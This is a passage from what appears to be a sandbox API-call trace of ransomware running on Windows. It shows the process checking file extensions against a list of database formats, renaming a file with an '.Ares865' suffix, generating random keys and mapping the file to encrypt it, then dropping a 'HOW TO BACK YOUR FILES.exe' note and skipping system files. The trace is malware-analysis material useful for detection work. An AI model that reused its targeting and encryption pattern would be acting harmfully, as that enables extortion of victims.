(lpString="edb") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="edb") returned 1 [0083.045] lstrlenW (lpString="epim") returned 4 [0083.045] lstrcmpiW (lpString1=".msu", lpString2="epim") returned -1 [0083.045] lstrlenW (lpString="fcd") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="fcd") returned 1 [0083.045] lstrlenW (lpString="fdb") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="fdb") returned 1 [0083.045] lstrlenW (lpString="fic") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="fic") returned 1 [0083.045] lstrlenW (lpString="flexolibrary") returned 12 [0083.045] lstrcmpiW (lpString1="9226-x64.msu", lpString2="flexolibrary") returned -1 [0083.045] lstrlenW (lpString="fm5") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="fm5") returned 1 [0083.046] lstrlenW (lpString="fmp") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="fmp") returned 1 [0083.046] lstrlenW (lpString="fmp12") returned 5 [0083.046] lstrcmpiW (lpString1="4.msu", lpString2="fmp12") returned -1 [0083.046] lstrlenW (lpString="fmpsl") returned 5 [0083.046] lstrcmpiW (lpString1="4.msu", lpString2="fmpsl") returned -1 [0083.046] lstrlenW (lpString="fol") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="fol") returned 1 [0083.046] lstrlenW (lpString="fp3") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="fp3") returned 1 [0083.046] lstrlenW (lpString="fp4") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="fp4") returned 1 [0083.046] lstrlenW (lpString="fp5") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="fp5") returned 1 [0083.046] lstrlenW (lpString="fp7") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="fp7") returned 1 [0083.046] lstrlenW (lpString="fpt") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="fpt") returned 1 [0083.046] lstrlenW (lpString="frm") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="frm") returned 1 [0083.046] lstrlenW (lpString="gdb") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="gdb") returned 1 [0083.046] lstrlenW (lpString="gdb") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="gdb") returned 1 [0083.046] lstrlenW (lpString="grdb") returned 4 [0083.046] lstrcmpiW (lpString1=".msu", lpString2="grdb") returned -1 [0083.046] lstrlenW (lpString="gwi") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="gwi") returned 1 [0083.046] lstrlenW (lpString="hdb") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="hdb") returned 1 [0083.046] lstrlenW (lpString="his") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="his") returned 1 [0083.046] lstrlenW (lpString="ib") returned 2 [0083.046] lstrcmpiW (lpString1="su", lpString2="ib") returned 1 [0083.046] lstrlenW (lpString="idb") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="idb") returned 1 [0083.046] lstrlenW (lpString="ihx") returned 3 [0083.046] lstrcmpiW (lpString1="msu", lpString2="ihx") returned 1 [0083.047] lstrlenW (lpString="itdb") returned 4 [0083.047] lstrcmpiW (lpString1=".msu", lpString2="itdb") returned -1 [0083.047] lstrlenW (lpString="itw") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="itw") returned 1 [0083.047] lstrlenW (lpString="jet") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="jet") returned 1 [0083.047] lstrlenW (lpString="jtx") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="jtx") returned 1 [0083.047] lstrlenW (lpString="kdb") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="kdb") returned 1 [0083.047] lstrlenW (lpString="kexi") returned 4 [0083.047] lstrcmpiW (lpString1=".msu", lpString2="kexi") returned -1 [0083.047] lstrlenW (lpString="kexic") returned 5 [0083.047] lstrcmpiW (lpString1="4.msu", lpString2="kexic") returned -1 [0083.047] lstrlenW (lpString="kexis") returned 5 [0083.047] lstrcmpiW (lpString1="4.msu", lpString2="kexis") returned -1 [0083.047] lstrlenW (lpString="lgc") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="lgc") returned 1 [0083.047] lstrlenW (lpString="lwx") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="lwx") returned 1 [0083.047] lstrlenW (lpString="maf") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="maf") returned 1 [0083.047] lstrlenW (lpString="maq") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="maq") returned 1 [0083.047] lstrlenW (lpString="mar") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="mar") returned 1 [0083.047] lstrlenW (lpString="marshal") returned 7 [0083.047] lstrcmpiW (lpString1="x64.msu", lpString2="marshal") returned 1 [0083.047] lstrlenW (lpString="mas") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="mas") returned 1 [0083.047] lstrlenW (lpString="mav") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="mav") returned 1 [0083.047] lstrlenW (lpString="maw") returned 3 [0083.047] lstrcmpiW (lpString1="msu", lpString2="maw") returned 1 [0083.047] lstrlenW (lpString="mdbhtml") returned 7 [0083.047] lstrcmpiW (lpString1="x64.msu", lpString2="mdbhtml") returned 1 [0083.047] lstrlenW (lpString="mdn") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="mdn") returned 1 [0083.048] lstrlenW (lpString="mdt") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="mdt") returned 1 [0083.048] lstrlenW (lpString="mfd") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="mfd") returned 1 [0083.048] lstrlenW (lpString="mpd") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="mpd") returned 1 [0083.048] lstrlenW (lpString="mrg") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="mrg") returned 1 [0083.048] lstrlenW (lpString="mud") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="mud") returned -1 [0083.048] lstrlenW (lpString="mwb") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="mwb") returned -1 [0083.048] lstrlenW (lpString="myd") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="myd") returned -1 [0083.048] lstrlenW (lpString="ndf") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="ndf") returned -1 [0083.048] lstrlenW (lpString="nnt") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="nnt") returned -1 [0083.048] lstrlenW (lpString="nrmlib") returned 6 [0083.048] lstrcmpiW (lpString1="64.msu", lpString2="nrmlib") returned -1 [0083.048] lstrlenW (lpString="ns2") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="ns2") returned -1 [0083.048] lstrlenW (lpString="ns3") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="ns3") returned -1 [0083.048] lstrlenW (lpString="ns4") returned 3 [0083.048] lstrcmpiW (lpString1="msu", lpString2="ns4") returned -1 [0083.048] lstrlenW (lpString="nsf") returned 3 [0083.049] lstrcmpiW (lpString1="msu", lpString2="nsf") returned -1 [0083.049] lstrlenW (lpString="nv") returned 2 [0083.049] lstrcmpiW (lpString1="su", lpString2="nv") returned 1 [0083.049] lstrlenW (lpString="nv2") returned 3 [0083.049] lstrcmpiW (lpString1="msu", lpString2="nv2") returned -1 [0083.049] lstrlenW (lpString="nwdb") returned 4 [0083.049] lstrcmpiW (lpString1=".msu", lpString2="nwdb") returned -1 [0083.049] lstrlenW (lpString="nyf") returned 3 [0083.049] lstrcmpiW (lpString1="msu", lpString2="nyf") returned -1 [0083.049] lstrlenW (lpString="odb") returned 3 [0083.049] lstrcmpiW (lpString1="msu", lpString2="odb") returned -1 [0083.049] lstrlenW (lpString="odb") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="odb") returned -1 [0083.050] lstrlenW (lpString="oqy") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="oqy") returned -1 [0083.050] lstrlenW (lpString="ora") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="ora") returned -1 [0083.050] lstrlenW (lpString="orx") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="orx") returned -1 [0083.050] lstrlenW (lpString="owc") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="owc") returned -1 [0083.050] lstrlenW (lpString="p96") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="p96") returned -1 [0083.050] lstrlenW (lpString="p97") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="p97") returned -1 [0083.050] lstrlenW (lpString="pan") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="pan") returned -1 [0083.050] lstrlenW (lpString="pdb") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="pdb") returned -1 [0083.050] lstrlenW (lpString="pdm") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="pdm") returned -1 [0083.050] lstrlenW (lpString="pnz") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="pnz") returned -1 [0083.050] lstrlenW (lpString="qry") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="qry") returned -1 [0083.050] lstrlenW (lpString="qvd") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="qvd") returned -1 [0083.050] lstrlenW (lpString="rbf") returned 3 [0083.050] lstrcmpiW (lpString1="msu", lpString2="rbf") returned -1 [0083.050] lstrlenW (lpString="rctd") returned 4 [0083.050] lstrcmpiW (lpString1=".msu", lpString2="rctd") returned -1 [0083.051] lstrlenW (lpString="rod") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="rod") returned -1 [0083.051] lstrlenW (lpString="rodx") returned 4 [0083.051] lstrcmpiW (lpString1=".msu", lpString2="rodx") returned -1 [0083.051] lstrlenW (lpString="rpd") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="rpd") returned -1 [0083.051] lstrlenW (lpString="rsd") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="rsd") returned -1 [0083.051] lstrlenW (lpString="sas7bdat") returned 8 [0083.051] lstrcmpiW (lpString1="-x64.msu", lpString2="sas7bdat") returned 1 [0083.051] lstrlenW (lpString="sbf") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="sbf") returned -1 [0083.051] lstrlenW (lpString="scx") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="scx") returned -1 [0083.051] lstrlenW (lpString="sdb") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="sdb") returned -1 [0083.051] lstrlenW (lpString="sdc") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="sdc") returned -1 [0083.051] lstrlenW (lpString="sdf") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="sdf") returned -1 [0083.051] lstrlenW (lpString="sis") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="sis") returned -1 [0083.051] lstrlenW (lpString="spq") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="spq") returned -1 [0083.051] lstrlenW (lpString="te") returned 2 [0083.051] lstrcmpiW (lpString1="su", lpString2="te") returned -1 [0083.051] lstrlenW (lpString="teacher") returned 7 [0083.051] lstrcmpiW (lpString1="x64.msu", lpString2="teacher") returned 1 [0083.051] lstrlenW (lpString="tmd") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="tmd") returned -1 [0083.051] lstrlenW (lpString="tps") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="tps") returned -1 [0083.051] lstrlenW (lpString="trc") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="trc") returned -1 [0083.051] lstrlenW (lpString="trc") returned 3 [0083.051] lstrcmpiW (lpString1="msu", lpString2="trc") returned -1 [0083.051] lstrlenW (lpString="trm") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="trm") returned -1 [0083.052] lstrlenW (lpString="udb") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="udb") returned -1 [0083.052] lstrlenW (lpString="udl") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="udl") returned -1 [0083.052] lstrlenW (lpString="usr") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="usr") returned -1 [0083.052] lstrlenW (lpString="v12") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="v12") returned -1 [0083.052] lstrlenW (lpString="vis") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="vis") returned -1 [0083.052] lstrlenW (lpString="vpd") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="vpd") returned -1 [0083.052] lstrlenW (lpString="vvv") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="vvv") returned -1 [0083.052] lstrlenW (lpString="wdb") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="wdb") returned -1 [0083.052] lstrlenW (lpString="wmdb") returned 4 [0083.052] lstrcmpiW (lpString1=".msu", lpString2="wmdb") returned -1 [0083.052] lstrlenW (lpString="wrk") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="wrk") returned -1 [0083.052] lstrlenW (lpString="xdb") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="xdb") returned -1 [0083.052] lstrlenW (lpString="xld") returned 3 [0083.052] lstrcmpiW (lpString1="msu", lpString2="xld") returned -1 [0083.052] lstrlenW (lpString="xmlff") returned 5 [0083.052] lstrcmpiW (lpString1="4.msu", lpString2="xmlff") returned -1 [0083.052] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.Ares865") returned 129 [0083.052] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.Ares865" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.ares865"), dwFlags=0x1) returned 1 [0083.054] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.Ares865" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.054] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1034556) returned 1 [0083.054] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.055] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.055] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.056] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.056] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfcc40, lpName=0x0) returned 0x15c [0083.057] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfcc40) returned 0xdd0000 [0083.151] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.151] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.151] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.152] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0083.161] CloseHandle (hObject=0x15c) returned 1 [0083.161] CloseHandle (hObject=0x118) returned 1 [0083.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.166] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab54b00, ftCreationTime.dwHighDateTime=0x1d1a02d, ftLastAccessTime.dwLowDateTime=0x9ab54b00, ftLastAccessTime.dwHighDateTime=0x1d1a02d, ftLastWriteTime.dwLowDateTime=0x9ab54b00, ftLastWriteTime.dwHighDateTime=0x1d1a02d, nFileSizeHigh=0x0, nFileSizeLow=0xfc93c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 0 [0083.166] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.166] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0083.166] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0083.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0083.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0083.166] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 73 [0083.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0083.166] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.167] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.167] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.168] GetLastError () returned 0x0 [0083.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.168] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.168] CloseHandle (hObject=0x120) returned 1 [0083.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.168] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.168] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.168] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.168] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.168] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.168] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.168] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.168] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2c9ac0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.168] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.168] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0083.168] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0083.169] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0083.169] lstrlenW (lpString="packages") returned 8 [0083.169] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*") returned 75 [0083.169] lstrcpyW (in: lpString1=0x2cce494, lpString2="packages" | out: lpString1="packages") returned="packages" [0083.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0083.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2e2710 [0083.169] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0083.169] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2c9ac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2c9ac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0083.169] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.169] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0083.169] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0083.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0083.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0083.169] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned 82 [0083.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package 